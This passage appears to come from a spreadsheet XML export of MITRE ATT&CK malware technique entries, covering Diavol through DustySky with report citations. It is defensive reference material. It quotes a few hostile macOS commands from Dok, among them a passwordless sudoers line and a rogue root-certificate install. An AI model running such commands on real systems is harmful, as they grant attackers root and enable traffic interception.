    <t>[Diavol](https://attack.mitre.org/software/S0659) has encrypted files using an RSA key though the `CryptEncrypt` API and has appended filenames with ".lock64". (Citation: Fortinet Diavol July 2021)</t>
  </si>
  <si>
    <t>[Diavol](https://attack.mitre.org/software/S0659) can attempt to stop security software.(Citation: Fortinet Diavol July 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Diavol](https://attack.mitre.org/software/S0659) has a command to traverse the files and directories in a given path.(Citation: Fortinet Diavol July 2021) </t>
  </si>
  <si>
    <t>[Diavol](https://attack.mitre.org/software/S0659) can receive configuration updates and additional payloads including wscpy.exe from C2.(Citation: Fortinet Diavol July 2021)</t>
  </si>
  <si>
    <t>[Diavol](https://attack.mitre.org/software/S0659) can delete shadow copies using the `IVssBackupComponents` COM object to call the `DeleteSnapshots` method.(Citation: Fortinet Diavol July 2021)</t>
  </si>
  <si>
    <t xml:space="preserve"> After encryption, [Diavol](https://attack.mitre.org/software/S0659) will capture the desktop background window, set the background color to black, and change the desktop wallpaper to a newly created bitmap image with the text “All your files are encrypted! For more information see “README-FOR-DECRYPT.txt".(Citation: Fortinet Diavol July 2021)</t>
  </si>
  <si>
    <t>[Diavol](https://attack.mitre.org/software/S0659) has used several API calls like `GetLogicalDriveStrings`, `SleepEx`, `SystemParametersInfoAPI`, `CryptEncrypt`, and others to execute parts of its attack.(Citation: Fortinet Diavol July 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Diavol](https://attack.mitre.org/software/S0659) has a `ENMDSKS` command to enumerates available network shares.(Citation: Fortinet Diavol July 2021) </t>
  </si>
  <si>
    <t>[Diavol](https://attack.mitre.org/software/S0659) has Base64 encoded the RSA public key used for encrypting files.(Citation: Fortinet Diavol July 2021)</t>
  </si>
  <si>
    <t>[Diavol](https://attack.mitre.org/software/S0659) has used `CreateToolhelp32Snapshot`, `Process32First`, and `Process32Next` API calls to enumerate the running processes in the system.(Citation: Fortinet Diavol July 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Diavol](https://attack.mitre.org/software/S0659) can use the ARP table to find remote hosts to scan.(Citation: Fortinet Diavol July 2021) </t>
  </si>
  <si>
    <t>[Diavol](https://attack.mitre.org/software/S0659) can spread throughout a network via SMB prior to encryption.(Citation: Fortinet Diavol July 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Diavol](https://attack.mitre.org/software/S0659) will terminate services using the Service Control Manager (SCM) API.(Citation: Fortinet Diavol July 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Diavol](https://attack.mitre.org/software/S0659) has obfuscated its main code routines within bitmap images as part of its anti-analysis techniques.(Citation: Fortinet Diavol July 2021) </t>
  </si>
  <si>
    <t>[Diavol](https://attack.mitre.org/software/S0659) can collect the computer name and OS version from the system.(Citation: Fortinet Diavol July 2021)</t>
  </si>
  <si>
    <t>[Diavol](https://attack.mitre.org/software/S0659) can enumerate victims' local and external IPs when registering with C2.(Citation: Fortinet Diavol July 2021)</t>
  </si>
  <si>
    <t>[Diavol](https://attack.mitre.org/software/S0659) can collect the username from a compromised host.(Citation: Fortinet Diavol July 2021)</t>
  </si>
  <si>
    <t>[Diavol](https://attack.mitre.org/software/S0659) has used HTTP GET and POST requests for C2.(Citation: Fortinet Diavol July 2021)</t>
  </si>
  <si>
    <t>[Dipsind](https://attack.mitre.org/software/S0200) can download remote files.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[Dipsind](https://attack.mitre.org/software/S0200) can be configured to only run during normal working hours, which would make its communications harder to distinguish from normal traffic.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[Dipsind](https://attack.mitre.org/software/S0200) encodes C2 traffic with base64.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[Dipsind](https://attack.mitre.org/software/S0200) encrypts C2 data with AES256 in ECB mode.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[Dipsind](https://attack.mitre.org/software/S0200) uses HTTP for C2.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[Dipsind](https://attack.mitre.org/software/S0200) can spawn remote shells.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>A [Dipsind](https://attack.mitre.org/software/S0200) variant registers as a Winlogon Event Notify DLL to establish persistence.(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[DnsSystem](https://attack.mitre.org/software/S1021)  can direct queries to custom DNS servers and return C2 commands using TXT records.(Citation: Zscaler Lyceum DnsSystem June 2022)</t>
  </si>
  <si>
    <t>[DnsSystem](https://attack.mitre.org/software/S1021) can upload files from infected machines after receiving a command with `uploaddd` in the string.(Citation: Zscaler Lyceum DnsSystem June 2022)</t>
  </si>
  <si>
    <t>[DnsSystem](https://attack.mitre.org/software/S1021) can exfiltrate collected data to its C2 server.(Citation: Zscaler Lyceum DnsSystem June 2022)</t>
  </si>
  <si>
    <t>[DnsSystem](https://attack.mitre.org/software/S1021) can download files to compromised systems after receiving a command with the string `downloaddd`.(Citation: Zscaler Lyceum DnsSystem June 2022)</t>
  </si>
  <si>
    <t>[DnsSystem](https://attack.mitre.org/software/S1021) has lured victims into opening macro-enabled Word documents for execution.(Citation: Zscaler Lyceum DnsSystem June 2022)</t>
  </si>
  <si>
    <t>[DnsSystem](https://attack.mitre.org/software/S1021) can write itself to the Startup folder to gain persistence.(Citation: Zscaler Lyceum DnsSystem June 2022)</t>
  </si>
  <si>
    <t>[DnsSystem](https://attack.mitre.org/software/S1021) can Base64 encode data sent to C2.(Citation: Zscaler Lyceum DnsSystem June 2022)</t>
  </si>
  <si>
    <t>[DnsSystem](https://attack.mitre.org/software/S1021) can use the Windows user name to create a unique identification for infected users and systems.(Citation: Zscaler Lyceum DnsSystem June 2022)</t>
  </si>
  <si>
    <t>[DnsSystem](https://attack.mitre.org/software/S1021) can use `cmd.exe` for execution.(Citation: Zscaler Lyceum DnsSystem June 2022)</t>
  </si>
  <si>
    <t>[Dok](https://attack.mitre.org/software/S0281) proxies web traffic to potentially monitor and alter victim HTTP(S) traffic.(Citation: objsee mac malware 2017)(Citation: CheckPoint Dok)</t>
  </si>
  <si>
    <t>[Dok](https://attack.mitre.org/software/S0281) uses AppleScript to create a login item for persistence.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">[Dok](https://attack.mitre.org/software/S0281) exfiltrates logs of its execution stored in the &lt;code&gt;/tmp&lt;/code&gt; folder over FTP using the &lt;code&gt;curl&lt;/code&gt; command.(Citation: hexed osx.dok analysis 2019) </t>
  </si>
  <si>
    <t>[Dok](https://attack.mitre.org/software/S0281) prompts the user for credentials.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[Dok](https://attack.mitre.org/software/S0281) installs a root certificate to aid in [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) actions using the command &lt;code&gt;add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /tmp/filename&lt;/code&gt;.(Citation: objsee mac malware 2017)(Citation: hexed osx.dok analysis 2019)</t>
  </si>
  <si>
    <t>[Dok](https://attack.mitre.org/software/S0281) installs two LaunchAgents to redirect all network traffic with a randomly generated name for each plist file maintaining the format &lt;code&gt;com.random.name.plist&lt;/code&gt;.(Citation: objsee mac malware 2017)(Citation: CheckPoint Dok)</t>
  </si>
  <si>
    <t>[Dok](https://attack.mitre.org/software/S0281) gives all users execute permissions for the application using the command &lt;code&gt;chmod +x /Users/Shared/AppStore.app&lt;/code&gt;.(Citation: CheckPoint Dok)</t>
  </si>
  <si>
    <t>[Dok](https://attack.mitre.org/software/S0281) uses AppleScript to install a login Item by sending Apple events to the &lt;code&gt;System Events&lt;/code&gt; process.(Citation: hexed osx.dok analysis 2019)</t>
  </si>
  <si>
    <t>[Dok](https://attack.mitre.org/software/S0281) downloads and installs [Tor](https://attack.mitre.org/software/S0183) via homebrew.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[Dok](https://attack.mitre.org/software/S0281) is packed with an UPX executable packer.(Citation: hexed osx.dok analysis 2019)</t>
  </si>
  <si>
    <t>[Dok](https://attack.mitre.org/software/S0281) adds &lt;code&gt;admin  ALL=(ALL) NOPASSWD: ALL&lt;/code&gt; to the &lt;code&gt;/etc/sudoers&lt;/code&gt; file.(Citation: hexed osx.dok analysis 2019)</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600) has used the embedTLS library for network communications.(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600) has used a script that gathers information from a hardcoded list of IP addresses and uploads to an Ngrok URL.(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600) was run through a deployed container.(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600) has used the DynDNS service and a DGA based on the Dogecoin blockchain to generate C2 domains.(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600)’s container was configured to bind the host root directory.(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600) has used Ngrok to establish C2 and exfiltrate data.(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600) was executed through an open Docker daemon API port.(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600) has resolved the path of a process PID to use as a script argument.(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600) has downloaded scripts from C2.(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600) has disguised a file as a Linux kernel module.(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600) has searched for the current process’s PID.(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600) has executed shell scripts with /bin/sh.(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600) has communicated with C2 over HTTPS.(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t>[Doki](https://attack.mitre.org/software/S0600) has used the dogechain.info API to generate a C2 address.(Citation: Intezer Doki July 20)</t>
  </si>
  <si>
    <t xml:space="preserve">[Donut](https://attack.mitre.org/software/S0695) can generate shellcode outputs that execute via Ruby.(Citation: Donut Github)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Donut](https://attack.mitre.org/software/S0695) can patch Antimalware Scan Interface (AMSI), Windows Lockdown Policy (WLDP), as well as exit-related [Native API](https://attack.mitre.org/techniques/T1106) functions to avoid process termination.(Citation: Donut Github)	</t>
  </si>
  <si>
    <t>[Donut](https://attack.mitre.org/software/S0695) can erase file references to payloads in-memory after being reflectively loaded and executed.(Citation: Donut Github)</t>
  </si>
  <si>
    <t>[Donut](https://attack.mitre.org/software/S0695) can download and execute previously staged shellcode payloads.(Citation: Donut Github)</t>
  </si>
  <si>
    <t xml:space="preserve">[Donut](https://attack.mitre.org/software/S0695) can generate shellcode outputs that execute via JavaScript or JScript.(Citation: Donut Github)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Donut](https://attack.mitre.org/software/S0695) code modules use various API functions to load and inject code.(Citation: Donut Github)	</t>
  </si>
  <si>
    <t>[Donut](https://attack.mitre.org/software/S0695) can generate encrypted, compressed/encoded, or otherwise obfuscated code modules.(Citation: Donut Github)</t>
  </si>
  <si>
    <t xml:space="preserve">[Donut](https://attack.mitre.org/software/S0695) can generate shellcode outputs that execute via PowerShell.(Citation: Donut Github)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Donut](https://attack.mitre.org/software/S0695) includes subprojects that enumerate and identify information about [Process Injection](https://attack.mitre.org/techniques/T1055) candidates.(Citation: Donut Github)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Donut](https://attack.mitre.org/software/S0695) includes a subproject &lt;code&gt;DonutTest&lt;/code&gt; to inject shellcode into a target process.(Citation: Donut Github)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Donut](https://attack.mitre.org/software/S0695) can generate shellcode outputs that execute via Python.(Citation: Donut Github)	</t>
  </si>
  <si>
    <t>[Donut](https://attack.mitre.org/software/S0695) can generate code modules that enable in-memory execution of VBScript, JScript, EXE, DLL, and dotNET payloads.(Citation: Donut Github)</t>
  </si>
  <si>
    <t xml:space="preserve">[Donut](https://attack.mitre.org/software/S0695) can generate packed code modules.(Citation: Donut Github)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Donut](https://attack.mitre.org/software/S0695) can generate shellcode outputs that execute via VBScript.(Citation: Donut Github)	</t>
  </si>
  <si>
    <t>[Donut](https://attack.mitre.org/software/S0695) can use HTTP to download previously staged shellcode payloads.(Citation: Donut Github)</t>
  </si>
  <si>
    <t>[DownPaper](https://attack.mitre.org/software/S0186) uses PowerShell for execution.(Citation: ClearSky Charming Kitten Dec 2017)</t>
  </si>
  <si>
    <t>[DownPaper](https://attack.mitre.org/software/S0186) searches and reads the value of the Windows Update Registry Run key.(Citation: ClearSky Charming Kitten Dec 2017)</t>
  </si>
  <si>
    <t>[DownPaper](https://attack.mitre.org/software/S0186) uses PowerShell to add a Registry Run key in order to establish persistence.(Citation: ClearSky Charming Kitten Dec 2017)</t>
  </si>
  <si>
    <t>[DownPaper](https://attack.mitre.org/software/S0186) collects the victim host name and serial number, and then sends the information to the C2 server.(Citation: ClearSky Charming Kitten Dec 2017)</t>
  </si>
  <si>
    <t>[DownPaper](https://attack.mitre.org/software/S0186) collects the victim username and sends it to the C2 server.(Citation: ClearSky Charming Kitten Dec 2017)</t>
  </si>
  <si>
    <t>[DownPaper](https://attack.mitre.org/software/S0186) communicates to its C2 server over HTTP.(Citation: ClearSky Charming Kitten Dec 2017)</t>
  </si>
  <si>
    <t>[DownPaper](https://attack.mitre.org/software/S0186) uses the command line.(Citation: ClearSky Charming Kitten Dec 2017)</t>
  </si>
  <si>
    <t>[Downdelph](https://attack.mitre.org/software/S0134) bypasses UAC to escalate privileges by using a custom “RedirectEXE” shim database.(Citation: ESET Sednit Part 3)</t>
  </si>
  <si>
    <t>[Downdelph](https://attack.mitre.org/software/S0134) uses search order hijacking of the Windows executable sysprep.exe to escalate privileges.(Citation: ESET Sednit Part 3)</t>
  </si>
  <si>
    <t>After downloading its main config file, [Downdelph](https://attack.mitre.org/software/S0134) downloads multiple payloads from C2 servers.(Citation: ESET Sednit Part 3)</t>
  </si>
  <si>
    <t>[Downdelph](https://attack.mitre.org/software/S0134) inserts pseudo-random characters between each original character during encoding of C2 network requests, making it difficult to write signatures on them.(Citation: ESET Sednit Part 3)</t>
  </si>
  <si>
    <t>[Downdelph](https://attack.mitre.org/software/S0134) uses RC4 to encrypt C2 responses.(Citation: ESET Sednit Part 3)</t>
  </si>
  <si>
    <t>[Dridex](https://attack.mitre.org/software/S0384) has encrypted traffic with RSA.(Citation: Kaspersky Dridex May 2017)</t>
  </si>
  <si>
    <t>[Dridex](https://attack.mitre.org/software/S0384) can perform browser attacks via web injects to steal information such as credentials, certificates, and cookies.(Citation: Dell Dridex Oct 2015)</t>
  </si>
  <si>
    <t>[Dridex](https://attack.mitre.org/software/S0384) has relied upon users clicking on a malicious attachment delivered through spearphishing.(Citation: Checkpoint Dridex Jan 2021)</t>
  </si>
  <si>
    <t>[Dridex](https://attack.mitre.org/software/S0384) can use multiple layers of proxy servers to hide terminal nodes in its infrastructure.(Citation: Checkpoint Dridex Jan 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Dridex](https://attack.mitre.org/software/S0384) has used the &lt;code&gt;OutputDebugStringW&lt;/code&gt; function to avoid malware analysis as part of its anti-debugging technique.(Citation: Checkpoint Dridex Jan 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Dridex](https://attack.mitre.org/software/S0384)'s strings are obfuscated using RC4.(Citation: Checkpoint Dridex Jan 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Dridex](https://attack.mitre.org/software/S0384) contains a backconnect module for tunneling network traffic through a victim's computer. Infected computers become part of a P2P botnet that can relay C2 traffic to other infected peers.(Citation: Dell Dridex Oct 2015)(Citation: Checkpoint Dridex Jan 2021) </t>
  </si>
  <si>
    <t>[Dridex](https://attack.mitre.org/software/S0384) contains a module for VNC.(Citation: Dell Dridex Oct 2015)</t>
  </si>
  <si>
    <t>[Dridex](https://attack.mitre.org/software/S0384) has collected a list of installed software on the system.(Citation: Checkpoint Dridex Jan 2021)</t>
  </si>
  <si>
    <t>[Dridex](https://attack.mitre.org/software/S0384) has encrypted traffic with RC4.(Citation: Kaspersky Dridex May 2017)</t>
  </si>
  <si>
    <t>[Dridex](https://attack.mitre.org/software/S0384) has collected the computer name and OS architecture information from the system.(Citation: Checkpoint Dridex Jan 2021)</t>
  </si>
  <si>
    <t>[Dridex](https://attack.mitre.org/software/S0384) has used POST requests and HTTPS for C2 communications.(Citation: Kaspersky Dridex May 2017)(Citation: Checkpoint Dridex Jan 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[DropBook](https://attack.mitre.org/software/S0547) can unarchive data downloaded from the C2 to obtain the payload and persistence modules.(Citation: Cybereason Molerats Dec 2020) </t>
  </si>
  <si>
    <t>[DropBook](https://attack.mitre.org/software/S0547) has used legitimate web services to exfiltrate data.(Citation: BleepingComputer Molerats Dec 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[DropBook](https://attack.mitre.org/software/S0547) can collect the names of all files and folders in the Program Files directories.(Citation: Cybereason Molerats Dec 2020)(Citation: BleepingComputer Molerats Dec 2020) </t>
  </si>
  <si>
    <t>[DropBook](https://attack.mitre.org/software/S0547) can download and execute additional files.(Citation: Cybereason Molerats Dec 2020)(Citation: BleepingComputer Molerats Dec 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[DropBook](https://attack.mitre.org/software/S0547) has checked for the presence of Arabic language in the infected machine's settings.(Citation: Cybereason Molerats Dec 2020) </t>
  </si>
  <si>
    <t>[DropBook](https://attack.mitre.org/software/S0547) has checked for the presence of Arabic language in the infected machine's settings.(Citation: BleepingComputer Molerats Dec 2020)</t>
  </si>
  <si>
    <t>[DropBook](https://attack.mitre.org/software/S0547) can communicate with its operators by exploiting the Simplenote, DropBox, and the social media platform, Facebook, where it can create fake accounts to control the backdoor and receive instructions.(Citation: Cybereason Molerats Dec 2020)(Citation: BleepingComputer Molerats Dec 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[DropBook](https://attack.mitre.org/software/S0547) can execute arbitrary shell commands on the victims' machines.(Citation: Cybereason Molerats Dec 2020)(Citation: BleepingComputer Molerats Dec 2020) </t>
  </si>
  <si>
    <t>[Drovorub](https://attack.mitre.org/software/S0502) can transfer files from the victim machine.(Citation: NSA/FBI Drovorub August 2020)</t>
  </si>
  <si>
    <t>[Drovorub](https://attack.mitre.org/software/S0502) has de-obsfuscated XOR encrypted payloads in WebSocket messages.(Citation: NSA/FBI Drovorub August 2020)</t>
  </si>
  <si>
    <t>[Drovorub](https://attack.mitre.org/software/S0502) can exfiltrate files over C2 infrastructure.(Citation: NSA/FBI Drovorub August 2020)</t>
  </si>
  <si>
    <t>[Drovorub](https://attack.mitre.org/software/S0502) can delete specific files from a compromised host.(Citation: NSA/FBI Drovorub August 2020)</t>
  </si>
  <si>
    <t>[Drovorub](https://attack.mitre.org/software/S0502) can download files to a compromised host.(Citation: NSA/FBI Drovorub August 2020)</t>
  </si>
  <si>
    <t>[Drovorub](https://attack.mitre.org/software/S0502) can use a port forwarding rule on its agent module to relay network traffic through the client module to a remote host on the same network.(Citation: NSA/FBI Drovorub August 2020)</t>
  </si>
  <si>
    <t>[Drovorub](https://attack.mitre.org/software/S0502) can use kernel modules to establish persistence.(Citation: NSA/FBI Drovorub August 2020)</t>
  </si>
  <si>
    <t>[Drovorub](https://attack.mitre.org/software/S0502) can use TCP to communicate between its agent and client modules.(Citation: NSA/FBI Drovorub August 2020)</t>
  </si>
  <si>
    <t>[Drovorub](https://attack.mitre.org/software/S0502) has used XOR encrypted payloads in WebSocket client to server messages.(Citation: NSA/FBI Drovorub August 2020)</t>
  </si>
  <si>
    <t>[Drovorub](https://attack.mitre.org/software/S0502) has used a kernel module rootkit to hide processes, files, executables, and network artifacts from user space view.(Citation: NSA/FBI Drovorub August 2020)</t>
  </si>
  <si>
    <t>[Drovorub](https://attack.mitre.org/software/S0502) can execute arbitrary commands as root on a compromised system.(Citation: NSA/FBI Drovorub August 2020)</t>
  </si>
  <si>
    <t>[Drovorub](https://attack.mitre.org/software/S0502) can use the WebSocket protocol and has initiated communication with C2 servers with an HTTP Upgrade request.(Citation: NSA/FBI Drovorub August 2020)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) packs collected data into a password protected archive.(Citation: Securelist Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567)’s RAT makes a persistent target file with auto execution on the host start.(Citation: Securelist Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) can retrieve browser history.(Citation: Securelist Dtrack)(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) can collect a variety of information from victim machines.(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) has used a decryption routine that is part of an executable physical patch.(Citation: Securelist Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) has used a dropper that embeds an encrypted payload as extra data.(Citation: Securelist Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) can remove its persistence and delete itself.(Citation: Securelist Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) can list files on available disk volumes.(Citation: Securelist Dtrack)(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>One of [Dtrack](https://attack.mitre.org/software/S0567) can replace the normal flow of a program execution with malicious code.(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567)’s can download and upload a file to the victim’s computer.(Citation: Securelist Dtrack)(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567)’s dropper contains a keylogging executable.(Citation: Securelist Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) can save collected data to disk, different file formats, and network shares.(Citation: Securelist Dtrack)(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>One of [Dtrack](https://attack.mitre.org/software/S0567) can hide in replicas of legitimate programs like OllyDbg, 7-Zip, and FileZilla.(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567)’s dropper can list all running processes.(Citation: Securelist Dtrack)(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) has used process hollowing shellcode to target a predefined list of processes from &lt;code&gt;%SYSTEM32%&lt;/code&gt;.(Citation: Securelist Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) can collect the RegisteredOwner, RegisteredOrganization, and InstallDate registry values.(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) contains a function that calls &lt;code&gt;LoadLibrary&lt;/code&gt; and &lt;code&gt;GetProcAddress&lt;/code&gt;.(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) can collect the victim's computer name, hostname and adapter information to create a unique identifier.(Citation: Securelist Dtrack)(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) can collect the host's IP addresses using the &lt;code&gt;ipconfig&lt;/code&gt; command.(Citation: Securelist Dtrack)(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) can collect network and active connection information.(Citation: Securelist Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) used hard-coded credentials to gain access to a network share.(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) has used &lt;code&gt;cmd.exe&lt;/code&gt; to add a persistent service.(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>[Dtrack](https://attack.mitre.org/software/S0567) can add a service called WBService to establish persistence.(Citation: CyberBit Dtrack)</t>
  </si>
  <si>
    <t>[Duqu](https://attack.mitre.org/software/S0038) examines running system processes for tokens that have specific system privileges. If it finds one, it will copy the token and store it for later use. Eventually it will start new processes with the stored token attached. It can also steal tokens to acquire administrative privileges.(Citation: Kaspersky Duqu 2.0)</t>
  </si>
  <si>
    <t>[Duqu](https://attack.mitre.org/software/S0038) uses a custom command and control protocol that communicates over commonly used ports, and is frequently encapsulated by application layer protocols.(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>The discovery modules used with [Duqu](https://attack.mitre.org/software/S0038) can collect information on open windows.(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>Modules can be pushed to and executed by [Duqu](https://attack.mitre.org/software/S0038) that copy data to a staging area, compress it, and XOR encrypt it.(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>[Duqu](https://attack.mitre.org/software/S0038) will inject itself into different processes to evade detection. The selection of the target process is influenced by the security software that is installed on the system (Duqu will inject into different processes depending on which security suite is installed on the infected host).(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>[Duqu](https://attack.mitre.org/software/S0038) can be configured to have commands relayed over a peer-to-peer network of infected hosts if some of the hosts do not have Internet access.(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>[Duqu](https://attack.mitre.org/software/S0038) can track key presses with a keylogger module.(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>The discovery modules used with [Duqu](https://attack.mitre.org/software/S0038) can collect information on accounts and permissions.(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>[Duqu](https://attack.mitre.org/software/S0038) has used &lt;code&gt;msiexec&lt;/code&gt; to execute malicious Windows Installer packages. Additionally, a PROPERTY=VALUE pair containing a 56-bit encryption key has been used to decrypt the main payload from the installer packages.(Citation: Kaspersky Duqu 2.0)</t>
  </si>
  <si>
    <t>The discovery modules used with [Duqu](https://attack.mitre.org/software/S0038) can collect information on process details.(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>[Duqu](https://attack.mitre.org/software/S0038) is capable of loading executable code via process hollowing.(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>Adversaries can instruct [Duqu](https://attack.mitre.org/software/S0038) to spread laterally by copying itself to shares it has enumerated and for which it has obtained legitimate credentials (via keylogging or other means). The remote host is then infected by using the compromised credentials to schedule a task on remote machines that executes the malware.(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>When the [Duqu](https://attack.mitre.org/software/S0038) command and control is operating over HTTP or HTTPS, Duqu uploads data to its controller by appending it to a blank JPG file.(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>The [Duqu](https://attack.mitre.org/software/S0038) command and control protocol's data stream can be encrypted with AES-CBC.(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>The reconnaissance modules used with [Duqu](https://attack.mitre.org/software/S0038) can collect information on network configuration.(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>The discovery modules used with [Duqu](https://attack.mitre.org/software/S0038) can collect information on network connections.(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>[Duqu](https://attack.mitre.org/software/S0038) creates a new service that loads a malicious driver when the system starts. When Duqu is active, the operating system believes that the driver is legitimate, as it has been signed with a valid private key.(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) can compress files via RAR while staging data to be exfiltrated.(Citation: Kaspersky MoleRATs April 2019)</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) has exfiltrated data to the C2 server.(Citation: Kaspersky MoleRATs April 2019)</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) has two hard-coded domains for C2 servers; if the first does not respond, it will try the second.(Citation: DustySky)</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) can delete files it creates from the infected system.(Citation: Kaspersky MoleRATs April 2019)</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) scans the victim for files that contain certain keywords and document types including PDF, DOC, DOCX, XLS, and XLSX, from a list that is obtained from the C2 as a text file. It can also identify logical drives for the infected machine.(Citation: DustySky)(Citation: Kaspersky MoleRATs April 2019)</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) contains a keylogger.(Citation: DustySky)</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) searches for network drives and removable media and duplicates itself onto them.(Citation: DustySky)</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) created folders in temp directories to host collected files before exfiltration.(Citation: Kaspersky MoleRATs April 2019)</t>
  </si>
  <si>
    <t>The [DustySky](https://attack.mitre.org/software/S0062) dropper uses a function to obfuscate the name of functions and other parts of the malware.(Citation: DustySky)</t>
  </si>
  <si>
